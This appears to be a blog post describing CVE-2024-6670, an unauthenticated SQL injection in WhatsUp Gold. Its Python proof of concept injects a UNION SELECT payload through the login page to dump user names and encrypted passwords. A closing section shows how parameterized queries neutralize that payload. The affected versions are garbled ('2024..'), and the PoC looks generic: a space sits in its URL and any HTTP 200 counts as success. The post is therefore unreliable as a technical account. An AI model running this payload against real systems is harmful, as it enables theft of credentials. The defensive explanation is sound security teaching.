CVE-2024-6670: Unauthenticated SQL Injection Vulnerability in WhatsUp Gold Pre-2024.. Versions - Exploit Details, Code Snippet, and Original References
Description: In this long-read post, we will delve into the details of the CVE-2024-6670 vulnerability, which affects the WhatsUp Gold application's versions released prior to 2024... This unauthenticated SQL Injection flaw enables an attacker to retrieve users' encrypted passwords. We will thoroughly explain the exploit, provide a code snippet that demonstrates the exploit in action, and link to original references that shed light on the issue. Let's get started.
Vulnerability Overview
The CVE-2024-6670 vulnerability affects the WhatsUp Gold application, specifically versions released before 2024... WhatsUp Gold is a powerful network monitoring and management software solution that assists IT teams in effectively overseeing their networks and addressing potential issues.
CVE-2024-6670 is a SQL Injection vulnerability that allows an unauthenticated attacker to retrieve users' encrypted passwords. This type of vulnerability arises from insufficient validation of user-supplied data that is incorporated into SQL queries. Consequently, attackers can manipulate the queries and exfiltrate sensitive information from the database.
Exploit Details
Exploiting the CVE-2024-6670 vulnerability involves sending a specially crafted HTTP request containing SQL commands. Since the affected versions of WhatsUp Gold do not properly validate or sanitize the input, the malicious SQL code injected into the request can be executed on the server.
By exploiting the vulnerability, an attacker can bypass authentication mechanisms and potentially gain unauthorized access to an affected WhatsUp Gold instance. Furthermore, an attacker might leverage the acquired encrypted passwords to compromise other accounts or systems if users have reused these credentials across services.
An example of how an attacker can conduct a SQL injection attack through this vulnerability is outlined below, along with a code snippet demonstrating the exploit.
Code Snippet
The following code snippet, written in Python, acts as a Proof of Concept (PoC) for exploiting the vulnerability:
import requests
import sys

# Target host or IP, taken from the first command-line argument
TARGET = sys.argv[1]
# Injection string placed in the password query parameter
EXPLOIT_PAYLOAD = "') UNION SELECT name, encrypted_password FROM Wug_user -- "
URL = f"http://{TARGET}/WhatsUp Gold/login.aspx?username=admin&password={EXPLOIT_PAYLOAD}"

response = requests.get(URL)

# The PoC treats any HTTP 200 response as success
if response.status_code == 200:
    print("PoC exploit successful!")
    print("Response content:")
    print(response.text)
else:
    print("PoC exploit failed!")
The script accepts a target IP address or hostname as input, crafts an HTTP request containing the SQL injection payload, and sends the request. Once executed, the attacker can observe the results of the SQL injection attack in the response received, potentially disclosing users' encrypted passwords.
Original References and External Links
For further information on the CVE-2024-6670 vulnerability and related discussions, please refer to the following collection of links:
1. Official CVE database entry: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-6670
2. WhatsUp Gold application website: https://www.whatsupgold.com/
Conclusion
The CVE-2024-6670 unauthenticated SQL injection vulnerability in versions of WhatsUp Gold released before 2024.. remains a significant security concern. Consequently, affected users are strongly advised to upgrade their installations to the most recent release to rectify this issue. Keep in mind that proper input validation and sanitization are essential for preventing SQL injection attacks, providing a robust line of defense against unauthorized access and data leaks.
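The following is an added example, not code from the original post or from WhatsUp Gold: it runs the payload string from the PoC above against a string-concatenated query and against the same query with bound parameters, a fix the post does not name but which removes the root cause it describes. The in-memory SQLite table, its rows, the query shape and the function names are constructed for illustration; only the table and column names come from the payload.

```python
import sqlite3

# Payload string exactly as it appears in the PoC on this page.
PAYLOAD = "') UNION SELECT name, encrypted_password FROM Wug_user -- "


def make_db():
    """Constructed in-memory stand-in; not the real WhatsUp Gold schema."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE Wug_user (name TEXT, encrypted_password TEXT)")
    db.executemany(
        "INSERT INTO Wug_user VALUES (?, ?)",
        [("admin", "ENC-aaaa"), ("operator", "ENC-bbbb")],  # constructed rows
    )
    return db


def login_concatenated(db, username, password):
    """Vulnerable pattern: request values are pasted into the SQL text,
    so a quote in the input ends the literal and the rest runs as SQL."""
    sql = (
        "SELECT name, encrypted_password FROM Wug_user "
        "WHERE name = '" + username + "' "
        "AND encrypted_password IN ('" + password + "')"
    )
    return db.execute(sql).fetchall()


def login_parameterized(db, username, password):
    """Hardened pattern: values are bound as parameters and are only ever
    compared as data, never parsed as part of the statement."""
    sql = (
        "SELECT name, encrypted_password FROM Wug_user "
        "WHERE name = ? AND encrypted_password IN (?)"
    )
    return db.execute(sql, (username, password)).fetchall()


if __name__ == "__main__":
    db = make_db()
    print("concatenated :", login_concatenated(db, "admin", PAYLOAD))
    print("parameterized:", login_parameterized(db, "admin", PAYLOAD))
```

The concatenated query returns every row of the table for the payload, while the parameterized query returns no rows because the whole payload is treated as one non-matching value.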
Timeline
Published on: 08/29/2024 22:15:05 UTC
Last modified on: 09/17/2024 01:00:01 UTC